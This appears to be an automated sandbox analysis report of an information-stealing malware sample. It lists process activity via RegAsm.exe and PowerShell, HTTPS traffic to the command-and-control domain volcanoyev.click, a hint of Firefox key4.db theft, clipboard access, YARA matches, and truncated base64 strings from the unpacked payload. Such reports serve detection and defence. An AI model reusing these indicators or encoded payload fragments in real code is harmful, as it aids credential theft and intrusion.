            Source: powershell.exe, 0000000D.00000002.1609901771.00000000063EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1623710657.00000000056EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1576756464.000000000634C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000001B.00000002.1650397592.00000000048F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: loaddll32.exe, 00000000.00000002.1679599025.0000000002731000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1626426593.00000000046C1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1636762344.00000000051F1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1588613450.0000000004761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1589335298.0000000005381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.00000000047A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000001B.00000002.1650397592.00000000048F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 0000000D.00000002.1589335298.0000000005381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.00000000047A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000001B.00000002.1650397592.00000000048F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000000F.00000002.1605796075.0000000004E5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.0000000005652000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.0000000004D20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 0000000D.00000002.1609901771.00000000063EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1623710657.00000000056EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1576756464.000000000634C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: RegAsm.exe, 00000029.00000002.1806244051.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.1807822091.00000000010F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/
            Source: RegAsm.exe, 00000029.00000002.1806244051.00000000010B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/4
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/D
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/L
            Source: RegAsm.exe, 00000020.00000002.1590077351.0000000000AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/W
            Source: RegAsm.exe, 0000001F.00000002.1586661294.0000000000C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/Y
            Source: RegAsm.exe, RegAsm.exe, 00000029.00000002.1807822091.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.1806244051.0000000001090000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/api
            Source: RegAsm.exe, 00000029.00000002.1807822091.00000000010ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/api9
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/apiSa
            Source: RegAsm.exe, 0000001F.00000002.1586661294.0000000000C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/apiU
            Source: RegAsm.exe, 00000023.00000002.1754899784.0000000001157000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.1807822091.00000000010ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/apin
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/e
            Source: RegAsm.exe, 00000020.00000002.1591162034.0000000000ADB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/k?
            Source: RegAsm.exe, RegAsm.exe, 00000029.00000002.1807822091.0000000001107000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click:443/api
            Source: RegAsm.exe, 00000023.00000002.1754899784.000000000117D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click:443/apiohrz.default-release/key4.dbPK
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49717 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49729 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,31_2_004329C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,31_2_004329C0

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: Process Memory Space: powershell.exe PID: 8068, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7228, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 5656, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            .NET source code contains very large strings
            Source: 13.2.powershell.exe.5878ad0.1.raw.unpack, Sap.csLong String: Length: 18812
            Source: 13.2.powershell.exe.588e750.0.raw.unpack, Sap.csLong String: Length: 18812
            Source: 15.2.powershell.exe.4b7ea38.1.raw.unpack, Sap.csLong String: Length: 18812
            Source: 15.2.powershell.exe.4b946b8.0.raw.unpack, Sap.csLong String: Length: 18812
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B56E900_2_00B56E90
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B56E800_2_00B56E80
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04326E904_2_04326E90
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04326E804_2_04326E80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04EA6E805_2_04EA6E80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04EA6E905_2_04EA6E90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044F6E806_2_044F6E80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_044F6E906_2_044F6E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040885031_2_00408850
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042386031_2_00423860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043881031_2_00438810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041682D31_2_0041682D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004288CB31_2_004288CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043D88031_2_0043D880
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004218A031_2_004218A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043094031_2_00430940
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040397031_2_00403970
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042093931_2_00420939
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004179C131_2_004179C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004231C231_2_004231C2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004241C031_2_004241C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043B1D031_2_0043B1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004291DD31_2_004291DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043D98031_2_0043D980
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040599031_2_00405990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042219031_2_00422190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043D99731_2_0043D997
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043D99931_2_0043D999
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004091B031_2_004091B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042CA4931_2_0042CA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042DA5331_2_0042DA53
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041626331_2_00416263
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040EA1031_2_0040EA10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041522031_2_00415220
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042CAD031_2_0042CAD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004252DD31_2_004252DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041B2E031_2_0041B2E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040628031_2_00406280
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043DA8031_2_0043DA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041E29031_2_0041E290
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041CB4031_2_0041CB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043D34D31_2_0043D34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00426B5031_2_00426B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043DB6031_2_0043DB60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00436B0831_2_00436B08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042830D31_2_0042830D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042CB1131_2_0042CB11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040432031_2_00404320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042CB2231_2_0042CB22
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042532731_2_00425327
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040833031_2_00408330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043F33031_2_0043F330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042A33F31_2_0042A33F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040DBD931_2_0040DBD9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042438031_2_00424380
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041FC7531_2_0041FC75
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041DC0031_2_0041DC00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00429C2B31_2_00429C2B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004291DD31_2_004291DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004074F031_2_004074F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040ACF031_2_0040ACF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041148F31_2_0041148F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042AC9031_2_0042AC90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043ECA031_2_0043ECA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040CD4631_2_0040CD46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043750031_2_00437500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042251031_2_00422510
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00417DEE31_2_00417DEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00437DF031_2_00437DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040958031_2_00409580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041759F31_2_0041759F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00425E7031_2_00425E70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00436E7431_2_00436E74
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042760331_2_00427603
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00425E3031_2_00425E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004286C031_2_004286C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043AEC031_2_0043AEC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004266D031_2_004266D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004236E231_2_004236E2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00405EE031_2_00405EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041DE8031_2_0041DE80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00402F5031_2_00402F50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00420F5031_2_00420F50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00438F5931_2_00438F59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040671031_2_00406710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00423F2031_2_00423F20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043F72031_2_0043F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00419F3031_2_00419F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041E7C031_2_0041E7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004197C231_2_004197C2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0042DFE931_2_0042DFE9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0040A78031_2_0040A780
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00411F9031_2_00411F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041879231_2_00418792
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041579931_2_00415799
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043EFB031_2_0043EFB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 35_2_01179FC335_2_01179FC3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 35_2_0118E74835_2_0118E748
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 35_2_0118A69835_2_0118A698
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010B9E5541_2_010B9E55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010BE57941_2_010BE579
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010B998141_2_010B9981
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010B100141_2_010B1001
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00408030 appears 42 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00414400 appears 65 times
            Source: iviewers.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
            Source: Process Memory Space: powershell.exe PID: 8068, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7228, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 5656, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: 13.2.powershell.exe.5878ad0.1.raw.unpack, Pls.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
            Source: 13.2.powershell.exe.5878ad0.1.raw.unpack, Sap.csBase64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1